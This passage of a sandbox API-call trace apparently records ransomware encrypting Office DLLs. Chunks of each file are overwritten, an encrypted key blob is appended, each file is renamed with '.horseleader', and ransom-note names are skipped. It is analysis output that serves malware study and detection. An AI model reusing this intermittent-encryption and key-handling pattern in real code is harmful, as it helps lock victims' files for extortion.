dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0241.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 72 [0241.185] StrStrW (lpFirst="ACEODTXT.DLL", lpSrch=".txt") returned 0x0 [0241.185] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15800) returned 1 [0241.185] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.307] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc248, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.307] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3db8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.308] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.308] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0241.308] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0241.308] CloseHandle (hObject=0x158) returned 1 [0241.308] GetProcessHeap () returned 0x780000 [0241.308] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0241.308] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.horseleader") returned 84 [0241.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.horseleader")) returned 1 [0241.309] GetProcessHeap () returned 0x780000 [0241.309] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0241.309] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8189720, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x833a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEOLEDB.DLL", cAlternateFileName="")) returned 1 [0241.309] lstrcmpiW (lpString1="ACEOLEDB.DLL", lpString2="Windows") returned -1 [0241.309] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 72 [0241.310] StrStrIW (lpFirst="ACEOLEDB.DLL", lpSrch=".horseleader") returned 0x0 [0241.310] lstrcmpW (lpString1="ACEOLEDB.DLL", lpString2="#Decrypt#.txt") returned 1 [0241.310] lstrcmpW (lpString1="ACEOLEDB.DLL", lpString2="_uninstalling_.png") returned 1 [0241.310] lstrlenW (lpString=".testttjffg") returned 11 [0241.310] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL", lpSrch=".testttjffg") returned 0x0 [0241.310] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0241.310] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0241.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0241.311] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 72 [0241.311] StrStrW (lpFirst="ACEOLEDB.DLL", lpSrch=".txt") returned 0x0 [0241.311] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=537504) returned 1 [0241.311] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.311] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.481] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.482] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3f1d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.482] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.542] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.542] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.543] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x7e3a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.543] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.644] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.644] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.644] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.644] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0241.644] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0241.645] CloseHandle (hObject=0x158) 
returned 1 [0241.645] GetProcessHeap () returned 0x780000 [0241.645] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0241.645] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.horseleader") returned 84 [0241.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.horseleader")) returned 1 [0241.646] GetProcessHeap () returned 0x780000 [0241.646] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0241.646] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96faef00, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd8247e00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x96faef00, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0x6e398, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACER3X.DLL", cAlternateFileName="")) returned 1 [0241.647] lstrcmpiW (lpString1="ACER3X.DLL", lpString2="Windows") returned -1 [0241.647] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 70 [0241.647] StrStrIW (lpFirst="ACER3X.DLL", lpSrch=".horseleader") returned 0x0 [0241.647] lstrcmpW (lpString1="ACER3X.DLL", lpString2="#Decrypt#.txt") returned 1 [0241.647] lstrcmpW (lpString1="ACER3X.DLL", lpString2="_uninstalling_.png") returned 1 [0241.647] lstrlenW 
(lpString=".testttjffg") returned 11 [0241.647] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL", lpSrch=".testttjffg") returned 0x0 [0241.647] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0241.647] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0241.647] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0241.648] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 70 [0241.648] StrStrW (lpFirst="ACER3X.DLL", lpSrch=".txt") returned 0x0 [0241.648] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=451480) returned 1 [0241.648] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.648] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.734] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.734] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.735] SetFilePointerEx (in: 
hFile=0x158, liDistanceToMove=0x349cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.735] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.994] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.994] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.994] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x69398, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.994] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.018] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.018] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.018] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.018] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0242.018] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0242.018] CloseHandle (hObject=0x158) returned 1 [0242.019] GetProcessHeap () returned 0x780000 [0242.019] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0242.019] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.horseleader") returned 82 [0242.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.horseleader")) returned 1 [0242.021] GetProcessHeap () returned 0x780000 [0242.021] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0242.021] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95c9c200, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd826df60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x95c9c200, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0xd9c0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACERCLR.DLL", cAlternateFileName="")) returned 1 [0242.021] lstrcmpiW (lpString1="ACERCLR.DLL", lpString2="Windows") returned -1 [0242.021] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 71 [0242.021] StrStrIW (lpFirst="ACERCLR.DLL", lpSrch=".horseleader") 
returned 0x0 [0242.021] lstrcmpW (lpString1="ACERCLR.DLL", lpString2="#Decrypt#.txt") returned 1 [0242.021] lstrcmpW (lpString1="ACERCLR.DLL", lpString2="_uninstalling_.png") returned 1 [0242.021] lstrlenW (lpString=".testttjffg") returned 11 [0242.021] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL", lpSrch=".testttjffg") returned 0x0 [0242.021] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0242.021] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0242.022] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0242.023] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 71 [0242.023] StrStrW (lpFirst="ACERCLR.DLL", lpSrch=".txt") returned 0x0 [0242.023] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=55744) returned 1 [0242.023] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.027] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, 
lpOverlapped=0x0) returned 1 [0242.028] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.123] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.123] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.123] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x39c0, lpOverlapped=0x0) returned 1 [0242.124] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc640, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.124] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x39c0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x39c0, lpOverlapped=0x0) returned 1 [0242.124] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.124] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0242.124] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0242.125] CloseHandle (hObject=0x158) returned 1 [0242.125] GetProcessHeap 
() returned 0x780000 [0242.125] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0242.125] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.horseleader") returned 83 [0242.125] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.horseleader")) returned 1 [0242.126] GetProcessHeap () returned 0x780000 [0242.126] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0242.126] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd826df60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xa8da0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEREP.DLL", cAlternateFileName="")) returned 1 [0242.126] lstrcmpiW (lpString1="ACEREP.DLL", lpString2="Windows") returned -1 [0242.126] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 70 [0242.126] StrStrIW (lpFirst="ACEREP.DLL", lpSrch=".horseleader") returned 0x0 [0242.126] lstrcmpW (lpString1="ACEREP.DLL", lpString2="#Decrypt#.txt") returned 1 [0242.126] lstrcmpW (lpString1="ACEREP.DLL", lpString2="_uninstalling_.png") returned 1 [0242.127] lstrlenW (lpString=".testttjffg") returned 11 
[0242.127] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL", lpSrch=".testttjffg") returned 0x0 [0242.127] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0242.127] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0242.127] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0242.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 70 [0242.127] StrStrW (lpFirst="ACEREP.DLL", lpSrch=".txt") returned 0x0 [0242.127] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=691616) returned 1 [0242.127] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.128] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.143] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x51ed0, 
